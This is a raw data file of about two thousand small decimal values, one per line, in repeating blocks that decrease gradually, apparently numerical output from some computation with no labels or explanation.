0.000271262
0.000267088
0.000271294
0.000267068
0.000271328
0.000267123
0.00027126
0.000271323
0.00026709
0.000275848
0.00027133
0.000253763
0.000258277
0.000258268
0.000262553
0.000262554
0.000262556
0.00025827
0.00025827
0.000253732
0.000249562
0.00025376
0.0002495
0.000253699
0.000253756
0.000249526
0.000253731
0.000249562
0.000253758
0.0002495
0.000253754
0.000253701
0.000249526
0.000258311
0.000262538
0.000262473
0.000258282
0.000258344
0.00026251
0.000258285
0.000258312
0.000262539
0.000262474
0.000258281
0.000262511
0.000258284
0.000258345
0.000253772
0.000249485
0.000249485
0.000253769
0.000253769
0.000249482
0.000253761
0.000258276
0.000271337
0.000271319
0.000267073
0.000267062
0.000271318
0.000271336
0.000267061
0.000275844
0.000280121
0.000275853
0.000275844
0.000280123
0.000275845
0.000275863
0.000280105
0.000280122
0.00027586
0.000280123
0.000275848
0.000271338
0.000267059
0.000271324
0.000271336
0.000267059
0.000271338
0.00027132
0.000267076
0.000267062
0.000271323
0.000271337
0.000267061
0.000275844
0.00028012
0.000275853
0.000280121
0.000275847
0.000275845
0.000275866
0.000280104
0.000280122
0.00028012
0.000275862
0.000275849
0.000271339
0.00026706
0.000271326
0.000271338
0.00026706
0.000258276
0.000262533
0.000262551
0.000258298
0.000262552
0.000258292
0.000258279
0.00025377
0.000253755
0.000249493
0.000253767
0.000249493
0.000258275
0.00026255
0.000258282
0.000262553
0.000258276
0.00025377
0.000253757
0.000249509
0.000249497
0.000253756
0.000253769
0.000249495
0.000258277
0.000262533
0.000262551
0.000258296
0.000262552
0.000258294
0.000258279
0.000253773
0.000253762
0.000249496
0.000253771
0.000249495
0.000258276
0.00026255
0.000258287
0.000262553
0.000258279
0.000253771
0.000253755
0.000249511
0.000249498
0.000253753
0.00025377
0.000249497
0.000275848
0.000271332
0.000275846
0.000271329
0.000258271
0.000262557
0.000262557
0.000262559
0.000258274
0.000258273
0.000253734
0.000249566
0.000253763
0.000249506
0.00024953
0.000253703
0.00025376
0.000253735
0.000249565
0.000253764
0.000249506
0.00024953
0.000253704
0.00025376
0.000258314
0.000262542
0.000262476
0.000258286
0.000262515
0.000258346
0.000258288
0.000258314
0.000262543
0.000262479
0.000258285
0.000262515
0.000258348
0.000258288
0.000253777
0.000249491
0.000249491
0.000249489
0.000253774
0.000253774
0.000253765
0.000258281
0.000253767
0.00025828
0.000240719
0.000236206
0.000240718
0.000236202
0.000236213
0.000231929
0.000231927
0.000236212
0.000236211
0.000231925
0.000240751
0.000244916
0.00024498
0.000240724
0.000244952
0.000240725
0.000240785
0.00024075
0.000244914
0.000244978
0.000240723
0.000244951
0.000240724
0.000240782
0.000240707
0.000244994
0.000244993
0.000244996
0.00024071
0.000240709
0.000236169
0.000231944
0.000236202
0.000232003
0.000236198
0.000231966
0.00023614
0.000236168
0.000231941
0.000236199
0.000232002
0.000236196
0.000231965
0.000236138
0.000218643
0.000223157
0.000218639
0.000223152
0.000223145
0.000227429
0.000227428
0.00022743
0.000223147
0.000223145
0.000218611
0.000214438
0.000218638
0.000214379
0.000218633
0.000218578
0.000214404
0.000218611
0.000214437
0.000218636
0.000214378
0.000218632
0.000218576
0.000214403
0.000223191
0.000227415
0.000227352
0.000223162
0.000227386
0.000223162
0.000223224
0.000223191
0.000227412
0.000227351
0.000223159
0.000227386
0.00022316
0.000223223
0.00021865
0.000214364
0.000214363
0.000218648
0.000218647
0.000214361
0.000236216
0.000236195
0.000231942
0.000231954
0.000236212
0.000236198
0.000231941
0.00024072
0.000244993
0.00024073
0.000244996
0.000240723
0.000240721
0.000240738
0.000244991
0.000244976
0.000240721
0.000244994
0.000240737
0.000236217
0.000231939
0.000236202
0.000236214
0.000231939
0.000223159
0.000227431
0.000227412
0.000223174
0.000227432
0.000223161
0.000223175
0.000218653
0.000218637
0.000214374
0.000214373
0.000218649
0.000223156
0.000227428
0.000223165
0.000227433
0.000223159
0.000218652
0.000218631
0.000214378
0.000214391
0.000214376
0.00021865
0.000218634
0.000223159
0.000227432
0.000227411
0.000223175
0.000227434
0.000223163
0.000223175
0.000218652
0.000218636
0.000214374
0.000218648
0.000214373
0.000223155
0.00022743
0.000223164
0.000227434
0.000223158
0.000218652
0.000218633
0.000214378
0.000214393
0.000218651
0.000218636
0.000214377
0.000236216
0.000231931
0.000231932
0.000236213
0.000236214
0.000231929
0.000240756
0.000244919
0.000244982
0.000240727
0.000240727
0.000244953
0.00024079
0.000240755
0.000244919
0.000244978
0.000240726
0.000240789
0.000244951
0.000240726
0.000240709
0.000244995
0.000244994
0.000240712
0.000244996
0.000240711
0.000236176
0.000231946
0.000236203
0.000232007
0.000236199
0.000236145
0.000231972
0.000236176
0.000231947
0.000236203
0.000232006
0.000236144
0.0002362
0.000231972
0.00024072
0.000236206
0.000218643
0.000223157
0.000223147
0.000227432
0.000227433
0.000227434
0.000223149
0.000223149
0.000218612
0.00021444
0.000218639
0.000214383
0.000218578
0.000218636
0.000214408
0.000218609
0.000214441
0.000218636
0.00021438
0.000218633
0.000218579
0.000214405
0.000223194
0.000227418
0.000227354
0.000223163
0.000223225
0.00022739
0.000223164
0.000223193
0.000227418
0.000227353
0.000223163
0.000227391
0.000223162
0.000223226
0.000218652
0.000214367
0.000214366
0.00021865
0.000218649
0.000214364
0.000218642
0.000223157
0.000236211
0.000236193
0.000231937
0.000231951
0.000236209
0.000236196
0.000231937
0.000240715
0.000244987
0.000240725
0.000244991
0.000240718
0.000240717
0.000240735
0.00024499
0.000244972
0.000240719
0.000244991
0.000240734
0.000236213
0.000231933
0.000236198
0.000236209
0.000231934
0.000223149
0.000227407
0.000227426
0.000223171
0.000227425
0.000223167
0.000223154
0.000218646
0.000218632
0.000214369
0.000214366
0.000218643
0.000223148
0.000227424
0.000223159
0.000227427
0.000223153
0.000218641
0.000218629
0.000214386
0.000214371
0.000214367
0.000218626
0.000218641
0.000223152
0.000227426
0.000227408
0.000223168
0.000227428
0.000223152
0.000223169
0.000218647
0.000218632
0.000214369
0.000218643
0.000214367
0.00022315
0.000227423
0.00022316
0.000227429
0.000223153
0.000218645
0.000218627
0.00021437
0.000214384
0.000218641
0.000218627
0.00021437
0.000236209
0.000236194
0.000231951
0.000231938
0.000236192
0.000236209
0.000231935
0.000240714
0.00024499
0.000240726
0.000240716
0.000244993
0.000240715
0.000240734
0.000244973
0.00024499
0.00024073
0.000244992
0.000240719
0.000236211
0.000231935
0.000236198
0.000236208
0.000231934
0.000236214
0.000236193
0.00023194
0.000231957
0.00023621
0.000236199
0.000231941
0.000240716
0.000244989
0.000240726
0.000244993
0.000240717
0.000240718
0.000240735
0.000244991
0.000244975
0.000244992
0.00024072
0.000240735
0.000236215
0.000231939
0.000236201
0.000236211
0.000231939
0.000223152
0.000227409
0.000227428
0.000223172
0.000227427
0.000223171
0.000223158
0.000218648
0.000218636
0.000214372
0.000218644
0.000214371
0.00022315
0.000227426
0.000223163
0.000227429
0.000223154
0.000218646
0.000218632
0.00021439
0.000214373
0.000218632
0.000218646
0.000214373
0.000223158
0.00022743
0.000227414
0.000223176
0.000227434
0.000223159
0.000223173
0.000218653
0.000218638
0.000214375
0.000218649
0.000214374
0.000223156
0.000227431
0.000223166
0.000227435
0.00022316
0.000218651
0.000218631
0.000214377
0.000214393
0.000218647
0.000218634
0.000214377
0.000236211
0.000231927
0.000231925
0.000236209
0.000236207
0.000231923
0.000240748
0.000244912
0.000244972
0.000240721
0.000240721
0.000244945
0.000240782
0.000240748
0.000244911
0.000244972
0.000240718
0.000240779
0.000244946
0.000240719
0.000240703
0.000244987
0.000244987
0.000240705
0.000244988
0.000240705
0.00023617
0.000231942
0.000236199
0.000232
0.000236196
0.000236136
0.000231966
0.000236168
0.000231939
0.000236194
0.000231998
0.000236134
0.000236192
0.000231964
0.000240713
0.000236197
0.00021864
0.000223153
0.000223143
0.000227427
0.000227427
0.000227429
0.000223145
0.000223144
0.000218612
0.000214437
0.000218637
0.000214377
0.000218577
0.000218632
0.000214405
0.000218608
0.000214437
0.000218633
0.000214376
0.000218629
0.000218576
0.000214402
0.00022319
0.000227412
0.000227349
0.00022316
0.000223223
0.000227384
0.00022316
0.000223188
0.000227412
0.000227347
0.000223157
0.000227383
0.000223158
0.000223221
0.000218648
0.000214361
0.000214361
0.000218645
0.000218644
0.000214358
0.000218639
0.000223151
0.000236203
0.000236185
0.000231942
0.00023193
0.000236184
0.000236201
0.000231929
0.000240709
0.000244985
0.000240718
0.00024071
0.000244988
0.00024071
0.000240732
0.000244966
0.000244985
0.000240725
0.000244986
0.000240713
0.000236204
0.000231928
0.000236191
0.000236201
0.000231928
0.000236205
0.000236186
0.000231946
0.000231931
0.000236188
0.000236202
0.000231931
0.000240712
0.000244986
0.000240722
0.00024499
0.000240716
0.000240712
0.000240732
0.000244969
0.000244988
0.000244988
0.00024073
0.000240714
0.000236208
0.00023193
0.000236194
0.000236204
0.000231929
0.000223153
0.000227403
0.000227422
0.000223171
0.000227424
0.000223169
0.000223155
0.00021865
0.000218635
0.000214373
0.000218646
0.000214371
0.00022315
0.000227421
0.00022316
0.000227425
0.000223153
0.000218649
0.000218632
0.00021439
0.000214376
0.000218633
0.000218647
0.000214375
0.000223152
0.000227404
0.000227422
0.00022317
0.000227424
0.000223173
0.000223153
0.00021865
0.000218635
0.000214373
0.000218646
0.000214371
0.00022315
0.000227422
0.000223161
0.000227426
0.000223154
0.000218648
0.000218632
0.000214393
0.000214377
0.000218634
0.000218646
0.000214375
0.000240719
0.000236206
0.000240716
0.0002362
0.000223143
0.000227428
0.000227427
0.000227429
0.000223145
0.000223144
0.000218609
0.000214439
0.000218639
0.000214379
0.000214405
0.000218576
0.000218634
0.000218607
0.000214437
0.000218635
0.000214379
0.000214403
0.000218575
0.000218632
0.000223189
0.000227413
0.000227352
0.000223162
0.000227386
0.000223222
0.000223161
0.000223188
0.000227412
0.000227347
0.000223158
0.000227386
0.00022322
0.000223159
0.000218649
0.000214364
0.000214363
0.000214361
0.000218647
0.000218646
0.000218643
0.000223156
0.000218639
0.000223152
0.000205589
0.000201075
0.00020559
0.000201077
0.000201084
0.000196799
0.0001968
0.000201082
0.000201083
0.000196797
0.000205624
0.000209785
0.00020985
0.000205596
0.00020982
0.000205596
0.000205656
0.000205624
0.000209785
0.000209848
0.000205597
0.000209819
0.000205596
0.000205655
0.000205579
0.000209864
0.000209863
0.000209865
0.000205581
0.000205581
0.00020104
0.000196813
0.000201069
0.000196871
0.000201067
0.000196837
0.000201009
0.000201042
0.000196816
0.000201073
0.000196871
0.000201068
0.000196838
0.000201008
0.000183506
0.000188019
0.000183507
0.00018802
0.000188012
0.000192298
0.000192299
0.0001923
0.000188011
0.000188012
0.000183472
0.000179301
0.0001835
0.000179241
0.000183496
0.000183441
0.000179267
0.000183472
0.0001793
0.0001835
0.000179242
0.000183497
0.000183441
0.000179267
0.000188057
0.000192281
0.000192218
0.000188026
0.000192253
0.000188026
0.000188091
0.000188057
0.000192285
0.000192217
0.000188028
0.000192254
0.000188028
0.000188091
0.000183513
0.000179225
0.000179226
0.000183511
0.000183512
0.000179224
0.000201085
0.000201066
0.000196809
0.000196826
0.000201081
0.000201067
0.000196808
0.000205589
0.000209862
0.000205602
0.000209869
0.000205594
0.000205593
0.000205611
0.000209867
0.000209845
0.000205595
0.000209867
0.000205611
0.000201087
0.000196809
0.000201073
0.000201083
0.000196805
0.00018802
0.000192296
0.000192273
0.000188041
0.000192296
0.000188025
0.000188039
0.000183514
0.000183498
0.000179236
0.000179231
0.000183506
0.000188015
0.000192289
0.000188028
0.000192298
0.000188021
0.000183511
0.000183496
0.000179239
0.000179257
0.000179237
0.00018351
0.000183491
0.00018802
0.000192296
0.000192276
0.000188042
0.000192296
0.000188025
0.000188039
0.000183519
0.000183502
0.000179241
0.000183512
0.000179236
0.000188019
0.000192295
0.000188032
0.000192301
0.000188026
0.000183512
0.000183497
0.000179241
0.000179261
0.00018351
0.000183494
0.00017924
0.000201086
0.0001968
0.000196801
0.000201084
0.000201084
0.000196799
0.000205628
0.000209787
0.000209853
0.0002056
0.000205599
0.000209824
0.000205661
0.000205626
0.000209788
0.00020985
0.000205597
0.000205659
0.000209822
0.000205597
0.000205581
0.000209867
0.000209866
0.000205583
0.000209868
0.000205583
0.000201045
0.000196816
0.000201074
0.000196877
0.00020107
0.000201014
0.000196841
0.000201044
0.000196816
0.000201071
0.000196875
0.000201011
0.000201069
0.000196841
0.000205591
0.000201077
0.00018351
0.000188023
0.000188018
0.000192301
0.000192302
0.000192303
0.000188017
0.000188019
0.000183479
0.000179305
0.000183504
0.000179248
0.000183444
0.000183503
0.000179273
0.00018348
0.000179306
0.000183508
0.000179251
0.000183505
0.000183446
0.000179275
0.000188064
0.000192285
0.000192222
0.000188031
0.000188096
0.000192257
0.000188032
0.000188065
0.000192287
0.000192222
0.000188035
0.000192258
0.000188034
0.000188097
0.000183521
0.000179232
0.000179234
0.000183518
0.00018352
0.000179231
0.000183514
0.000188026
0.000201078
0.000201063
0.000196803
0.000196819
0.000201077
0.00020106
0.000196803
0.000205582
0.000209855
0.000205594
0.000209862
0.000205586
0.000205587
0.000205608
0.000209861
0.00020984
0.00020559
0.000209861
0.000205604
0.00020108
0.000196802
0.000201065
0.000201074
0.000196799
0.00018802
0.000192277
0.000192292
0.000188037
0.000192296
0.000188038
0.000188021
0.000183517
0.000183499
0.000179236
0.000179232
0.000183509
0.000188017
0.000192294
0.00018803
0.000192301
0.000188023
0.000183512
0.000183491
0.000179254
0.000179237
0.000179236
0.000183493
0.000183508
0.000188019
0.000192291
0.000192272
0.000188037
0.000192293
0.000188022
0.00018804
0.000183516
0.000183499
0.000179238
0.000183509
0.000179232
0.000188015
0.000192288
0.000188029
0.000192296
0.000188022
0.000183511
0.000183495
0.000179239
0.000179256
0.00018351
0.000183494
0.000179236
0.000201085
0.000201069
0.000196826
0.000196812
0.000201066
0.000201084
0.00019681
0.000205589
0.000209862
0.000205598
0.000205593
0.000209868
0.000205592
0.000205611
0.000209845
0.000209864
0.00020561
0.000209865
0.000205595
0.000201087
0.000196811
0.00020107
0.000201081
0.000196807
0.000201087
0.000201069
0.000196812
0.000196824
0.000201085
0.00020107
0.00019681
0.000205591
0.000209862
0.0002056
0.000209869
0.000205596
0.000205594
0.000205612
0.000209866
0.000209848
0.000209869
0.000205597
0.000205612
0.00020109
0.000196809
0.000201072
0.000201085
0.000196807
0.000188027
0.000192278
0.000192299
0.000188043
0.0001923
0.000188046
0.00018803
0.000183523
0.000183505
0.000179242
0.000183516
0.000179238
0.000188023
0.000192297
0.000188035
0.000192304
0.000188029
0.000183519
0.000183501
0.000179262
0.000179244
0.000183501
0.000183517
0.000179243
0.000188025
0.000192298
0.000192274
0.000188044
0.000192299
0.000188029
0.00018804
0.000183519
0.000183504
0.000179239
0.000183511
0.000179235
0.00018802
0.000192294
0.000188034
0.000192302
0.000188025
0.000183516
0.000183499
0.000179244
0.000179256
0.000183517
0.000183492
0.00017924
0.000201079
0.000196795
0.000196795
0.000201078
0.000201078
0.000196792
0.00020562
0.000209784
0.000209845
0.000205593
0.000205592
0.000209818
0.000205654
0.00020562
0.000209784
0.000209846
0.000205593
0.000205654
0.000209817
0.000205592
0.000205574
0.00020986
0.00020986
0.000205576
0.000209861
0.000205576
0.000201037
0.00019681
0.000201067
0.00019687
0.000201063
0.000201005
0.000196835
0.000201037
0.000196811
0.000201067
0.000196871
0.000201007
0.000201063
0.000196836
0.000205586
0.000201072
0.000183506
0.000188019
0.000188012
0.000192296
0.000192296
0.000192297
0.000188013
0.000188012
0.000183473
0.000179299
0.000183499
0.000179246
0.00018344
0.000183499
0.00017927
0.000183473
0.000179301
0.000183498
0.000179243
0.000183497
0.000183441
0.000179269
0.000188058
0.00019228
0.000192216
0.000188026
0.000188091
0.000192251
0.000188028
0.000188059
0.000192281
0.000192217
0.000188026
0.000192253
0.000188027
0.000188091
0.000183515
0.000179229
0.000179228
0.000183514
0.000183513
0.000179227
0.000183505
0.000188018
0.000201082
0.000201064
0.000196822
0.000196805
0.000201065
0.000201079
0.000196804
0.000205586
0.00020986
0.000205595
0.00020559
0.000209867
0.000205592
0.000205611
0.000209846
0.000209865
0.000205609
0.000209867
0.000205593
0.000201084
0.000196803
0.000201065
0.000201077
0.0001968
0.000201078
0.000201063
0.00019682
0.000196806
0.000201061
0.000201078
0.000196803
0.000205583
0.000209858
0.000205596
0.000209865
0.000205588
0.000205587
0.000205611
0.000209844
0.000209864
0.000209863
0.000205607
0.00020559
0.000201081
0.000196803
0.000201066
0.000201075
0.000196799
0.000188017
0.000192271
0.00019229
0.000188031
0.000192292
0.000188034
0.000188016
0.000183514
0.000183498
0.000179236
0.000183506
0.000179231
0.000188013
0.000192287
0.000188027
0.000192295
0.000188018
0.00018351
0.000183489
0.000179254
0.000179235
0.00018349
0.000183504
0.000179236
0.000188016
0.000192267
0.000192291
0.000188034
0.000192291
0.000188034
0.000188019
0.00018351
0.000183496
0.000179233
0.000183503
0.000179226
0.000188011
0.000192287
0.000188027
0.000192294
0.000188019
0.000183505
0.000183488
0.00017925
0.000179234
0.000183484
0.000183505
0.00017923
0.00020559
0.000201076
0.000205587
0.000201072
0.000188013
0.000192297
0.000192295
0.000192297
0.000188014
0.000188012
0.000183477
0.000179305
0.000183505
0.000179247
0.000179273
0.000183443
0.000183502
0.000183476
0.000179302
0.0001835
0.000179246
0.000179272
0.000183441
0.000183499
0.000188058
0.000192282
0.000192217
0.000188031
0.000192251
0.000188091
0.000188031
0.000188057
0.000192279
0.000192215
0.000188026
0.000192251
0.000188089
0.000188027
0.000183518
0.000179231
0.00017923
0.00017923
0.000183516
0.000183514
0.000183511
0.000188024
0.000183505
0.000188017
0.000170448
0.000165937
0.000170447
0.000165934
0.00016594
0.000161653
0.000161653
0.00016594
0.000165939
0.000161652
0.000170485
0.000174646
0.000174708
0.000170456
0.000174678
0.000170455
0.000170519
0.000170485
0.000174644
0.00017471
0.000170456
0.000174679
0.000170455
0.000170517
0.000170438
0.000174724
0.000174725
0.000174724
0.000170438
0.000170438
0.0001659
0.000161671
0.000165929
0.000161731
0.000165925
0.000161696
0.000165869
0.000165898
0.000161669
0.000165925
0.000161731
0.000165923
0.000161696
0.000165869
0.000148365
0.000152873
0.000148364
0.000152873
0.000152868
0.000157154
0.000157153
0.000157153
0.000152867
0.000152867
0.00014833
0.000144157
0.000148355
0.000144099
0.000148354
0.000148298
0.000144127
0.000148328
0.000144158
0.000148352
0.000144096
0.000148352
0.000148299
0.000144124
0.000152917
0.000157138
0.000157074
0.000152884
0.000157108
0.000152884
0.00015295
0.000152918
0.000157137
0.000157073
0.000152885
0.000157109
0.000152883
0.000152951
0.000148369
0.000144081
0.00014408
0.00014837
0.000148369
0.00014408
0.000165948
0.000165931
0.000161672
0.000161692
0.000165945
0.000165926
0.000161672
0.00017045
0.000174724
0.000170463
0.000174734
0.000170458
0.000170455
0.000170476
0.000174729
0.00017471
0.000170459
0.000174729
0.000170477
0.000165952
0.000161671
0.000165931
0.000165941
0.000161663
0.00015288
0.000157153
0.00015713
0.000152898
0.000157155
0.000152883
0.000152904
0.000148374
0.000148353
0.000144092
0.000144081
0.000148359
0.000152868
0.000157144
0.000152887
0.000157159
0.00015288
0.000148368
0.000148354
0.000144096
0.000144116
0.000144092
0.000148367
0.000148343
0.000152879
0.000157153
0.000157129
0.000152895
0.000157156
0.000152882
0.000152901
0.000148376
0.000148356
0.000144094
0.000148364
0.000144082
0.000152871
0.000157149
0.000152891
0.000157162
0.000152884
0.000148367
0.000148353
0.000144096
0.000144114
0.000148365
0.000148342
0.000144091
0.000165947
0.000161659
0.00016166
0.000165946
0.000165947
0.000161659
0.000170492
0.00017465
0.000174715
0.000170462
0.000170461
0.000174685
0.000170524
0.000170494
0.000174651
0.000174718
0.000170465
0.000170525
0.000174687
0.000170463
0.000170446
0.000174731
0.000174733
0.000170445
0.000174732
0.000170447
0.000165905
0.000161675
0.000165932
0.000161736
0.00016593
0.000165874
0.000161702
0.000165906
0.000161676
0.000165933
0.000161737
0.000165874
0.000165931
0.000161702
0.000170455
0.000165941
0.000148368
0.000152877
0.000152875
0.000157159
0.00015716
0.000157159
0.000152872
0.000152873
0.000148335
0.000144164
0.000148358
0.000144103
0.000148302
0.000148359
0.000144131
0.000148335
0.000144162
0.000148359
0.000144104
0.000148359
0.000148302
0.00014413
0.000152923
0.000157143
0.000157077
0.000152889
0.000152955
0.000157113
0.000152889
0.000152923
0.000157143
0.000157078
0.00015289
0.000157112
0.000152889
0.000152955
0.000148376
0.000144086
0.000144086
0.000148375
0.000148375
0.000144086
0.00014837
0.000152878
0.00016594
0.000165925
0.000161667
0.000161684
0.000165938
0.00016592
0.000161666
0.000170444
0.000174718
0.000170458
0.00017473
0.000170452
0.00017045
0.000170471
0.000174726
0.000174702
0.000170454
0.000174725
0.000170472
0.000165946
0.000161665
0.000165926
0.000165936
0.000161658
0.00015288
0.000157126
0.000157153
0.000152894
0.000157152
0.000152902
0.000152884
0.000148377
0.000148352
0.000144095
0.000144083
0.000148362
0.000152869
0.000157144
0.000152886
0.000157158
0.00015288
0.000148371
0.000148352
0.00014412
0.000144097
0.000144094
0.000148347
0.000148366
0.00015288
0.000157152
0.000157128
0.000152893
0.000157155
0.000152882
0.000152904
0.000148376
0.000148353
0.000144096
0.000148361
0.000144083
0.000152869
0.000157144
0.000152887
0.000157159
0.000152881
0.000148368
0.000148349
0.000144096
0.000144117
0.000148364
0.000148343
0.000144093
0.000165949
0.000165929
0.000161691
0.000161672
0.000165928
0.000165944
0.000161672
0.00017045
0.000174724
0.000170464
0.000170458
0.000174736
0.000170458
0.000170475
0.000174711
0.00017473
0.000170481
0.000174732
0.000170459
0.000165952
0.00016167
0.000165931
0.000165941
0.000161663
0.000165946
0.000165925
0.000161672
0.000161689
0.000165943
0.000165923
0.00016167
0.000170448
0.000174722
0.000170461
0.000174733
0.000170455
0.000170454
0.000170474
0.00017473
0.000174706
0.000174729
0.000170458
0.000170475
0.000165949
0.000161669
0.000165929
0.000165938
0.000161661
0.000152883
0.000157133
0.000157157
0.0001529
0.000157159
0.000152906
0.000152888
0.000148378
0.000148357
0.000144098
0.000148365
0.000144085
0.000152873
0.000157149
0.000152892
0.000157163
0.000152884
0.000148371
0.000148355
0.000144122
0.000144099
0.000148346
0.00014837
0.000144095
0.000152885
0.000157157
0.000157133
0.000152902
0.000157158
0.000152887
0.00015291
0.000148381
0.000148359
0.000144099
0.000148368
0.000144087
0.000152874
0.000157149
0.000152892
0.000157163
0.000152886
0.000148374
0.000148359
0.0001441
0.000144125
0.000148371
0.000148353
0.000144097
0.00016594
0.000161654
0.000161654
0.00016594
0.00016594
0.000161653
0.000170485
0.000174642
0.000174712
0.000170457
0.000170456
0.00017468
0.000170517
0.000170484
0.000174645
0.000174709
0.000170456
0.000170517
0.00017468
0.000170454
0.000170439
0.000174727
0.000174726
0.00017044
0.000174727
0.000170439
0.000165899
0.000161671
0.000165927
0.00016173
0.000165924
0.000165867
0.000161698
0.000165898
0.00016167
0.000165926
0.00016173
0.000165867
0.000165924
0.000161696
0.000170447
0.000165934
0.000148364
0.000152874
0.000152868
0.000157154
0.000157154
0.000157154
0.000152867
0.000152867
0.000148326
0.000144159
0.000148352
0.000144096
0.0001483
0.000148351
0.000144123
0.000148328
0.00014416
0.000148355
0.000144099
0.000148354
0.0001483
0.000144124
0.000152918
0.000157138
0.000157072
0.000152886
0.000152951
0.000157109
0.000152883
0.000152918
0.000157138
0.000157072
0.000152886
0.000157108
0.000152884
0.00015295
0.000148368
0.000144079
0.000144081
0.000148368
0.000148369
0.000144079
0.000148366
0.000152874
0.00016594
0.000165923
0.000161685
0.000161667
0.000165919
0.000165938
0.000161664
0.000170442
0.000174719
0.000170459
0.00017045
0.000174729
0.00017045
0.000170468
0.000174703
0.000174722
0.000170473
0.000174725
0.000170452
0.000165944
0.000161663
0.000165925
0.000165934
0.000161656
0.000165939
0.000165923
0.000161686
0.000161667
0.000165918
0.000165938
0.000161665
0.000170443
0.000174716
0.000170459
0.000174726
0.000170452
0.000170449
0.000170469
0.000174698
0.000174722
0.000174722
0.000170471
0.000170453
0.000165946
0.000161668
0.000165927
0.000165936
0.000161659
0.000152878
0.000157127
0.000157153
0.000152898
0.000157153
0.000152902
0.000152885
0.000148377
0.000148353
0.000144097
0.000148363
0.000144085
0.000152869
0.000157144
0.000152886
0.000157157
0.00015288
0.000148369
0.000148359
0.00014412
0.0001441
0.000148346
0.00014837
0.000144095
0.000152883
0.000157129
0.000157152
0.000152901
0.000157155
0.000152908
0.000152885
0.000148382
0.000148359
0.000144101
0.00014837
0.000144087
0.000152875
0.000157149
0.000152892
0.000157163
0.000152889
0.000148374
0.000148361
0.000144123
0.000144099
0.000148351
0.00014837
0.000144097
0.00017045
0.000165937
0.000170449
0.000165937
0.000152871
0.000157157
0.000157157
0.000157156
0.00015287
0.00015287
0.000148334
0.000144165
0.00014836
0.000144105
0.000144133
0.000148304
0.000148359
0.000148333
0.000144165
0.000148358
0.000144102
0.000144132
0.000148305
0.000148357
0.00015292
0.00015714
0.000157077
0.00015289
0.00015711
0.000152954
0.000152888
0.000152919
0.000157141
0.000157078
0.000152889
0.000157111
0.000152956
0.000152886
0.000148374
0.000144086
0.000144085
0.000144086
0.000148374
0.000148373
0.000148371
0.000152878
0.000148369
0.000152877
0.000135298
0.000130795
0.000135297
0.000130795
0.000130794
0.000126504
0.000126504
0.000130796
0.000130796
0.000126505
0.000135345
0.000139499
0.000139565
0.000135314
0.000139534
0.00013531
0.000135376
0.000135343
0.000139501
0.000139563
0.000135311
0.000139532
0.000135308
0.000135377
0.000135294
0.000139582
0.000139581
0.00013958
0.000135292
0.000135291
0.000130753
0.000126522
0.00013078
0.000126584
0.00013078
0.000126549
0.000130727
0.000130752
0.000126523
0.000130779
0.000126582
0.000130779
0.00012655
0.000130726
0.000113225
0.000117716
0.000113223
0.000117714
0.000117718
0.000122008
0.000122008
0.000122005
0.000117714
0.000117714
0.000113178
0.000108998
0.000113204
0.000108943
0.000113205
0.000113149
0.000108973
0.000113177
0.000108999
0.000113201
0.000108943
0.000113204
0.00011315
0.000108972
0.00011777
0.00012199
0.000121923
0.000117738
0.000121954
0.000117733
0.000117799
0.000117769
0.00012199
0.000121922
0.000117736
0.000121955
0.000117732
0.000117799
0.00011322
0.000108922
0.000108922
0.000113223
0.000113222
0.000108925
0.000130794
0.000130782
0.000126523
0.000126548
0.000130792
0.000130765
0.000126518
0.000135292
0.000139571
0.000135316
0.000139588
0.000135309
0.000135304
0.000135324
0.000139579
0.000139547
0.000135311
0.000139577
0.000135333
0.000130805
0.000126522
0.000130779
0.000130787
0.000126504
0.000117734
0.000122003
0.000121967
0.000117749
0.000122004
0.00011774
0.000117768
0.000113238
0.000113201
0.000108945
0.00010892
0.000113212
0.000117713
0.000121994
0.000117741
0.000122018
0.000117736
0.000113221
0.00011321
0.00010895
0.000108985
0.000108944
0.000113216
0.000113184
0.000117733
0.000122004
0.000121971
0.000117746
0.000122004
0.00011774
0.000117768
0.000113237
0.000113199
0.000108943
0.00011321
0.000108919
0.000117713
0.000121996
0.000117742
0.00012202
0.000117736
0.00011322
0.000113207
0.000108948
0.000108981
0.000113217
0.000113181
0.000108942
0.0001308
0.000126508
0.000126508
0.000130801
0.000130801
0.000126509
0.000135348
0.000139504
0.000139569
0.000135317
0.000135314
0.000139535
0.000135379
0.000135347
0.000139502
0.00013957
0.000135318
0.000135376
0.000139535
0.000135314
0.000135299
0.000139586
0.000139587
0.000135296
0.000139584
0.000135296
0.000130759
0.000126526
0.000130784
0.000126584
0.000130784
0.000130727
0.000126555
0.000130758
0.000126527
0.000130783
0.000126583
0.000130724
0.000130784
0.000126555
0.000135301
0.000130798
0.000113223
0.000117715
0.000117719
0.00012201
0.000122011
0.000122007
0.000117714
0.000117715
0.000113175
0.000108999
0.000113201
0.000108943
0.00011315
0.000113204
0.00010897
0.000113178
0.000109001
0.000113204
0.000108944
0.000113206
0.000113151
0.000108971
0.00011777
0.000121991
0.000121922
0.000117737
0.000117801
0.000121956
0.000117732
0.000117772
0.000121993
0.000121924
0.00011774
0.000121957
0.000117735
0.000117801
0.000113221
0.000108922
0.000108923
0.000113223
0.000113224
0.000108925
0.000113225
0.000117717
0.000130793
0.000130781
0.000126522
0.000126549
0.000130793
0.000130765
0.000126517
0.000135294
0.000139573
0.000135316
0.000139591
0.000135311
0.000135307
0.000135325
0.000139583
0.000139553
0.000135315
0.000139581
0.000135337
0.000130806
0.00012652
0.000130778
0.000130787
0.000126502
0.000117731
0.000121968
0.000122003
0.000117746
0.000122003
0.000117766
0.000117738
0.000113235
0.000113199
0.000108942
0.000108917
0.000113209
0.000117711
0.000121993
0.00011774
0.000122017
0.000117733
0.000113217
0.000113208
0.00010898
0.000108946
0.00010894
0.000113182
0.000113214
0.000117729
0.000122002
0.000121967
0.000117744
0.000122002
0.000117736
0.000117763
0.000113233
0.000113198
0.000108942
0.000113207
0.000108917
0.000117709
0.000121992
0.00011774
0.000122017
0.000117732
0.000113215
0.000113206
0.000108945
0.000108978
0.000113212
0.000113177
0.000108939
0.000130792
0.00013078
0.000126545
0.000126522
0.000130764
0.000130792
0.000126517
0.000135293
0.000139574
0.000135318
0.00013531
0.000139591
0.000135306
0.000135328
0.000139555
0.00013958
0.000135336
0.000139581
0.000135312
0.000130805
0.00012652
0.000130779
0.000130786
0.000126502
0.000130795
0.000130783
0.000126523
0.000126546
0.000130792
0.000130766
0.000126518
0.000135295
0.000139575
0.000135318
0.000139592
0.000135312
0.000135308
0.000135328
0.000139581
0.000139556
0.000139582
0.000135312
0.000135338
0.000130807
0.000126521
0.000130779
0.000130788
0.000126503
0.000117732
0.000121969
0.000122004
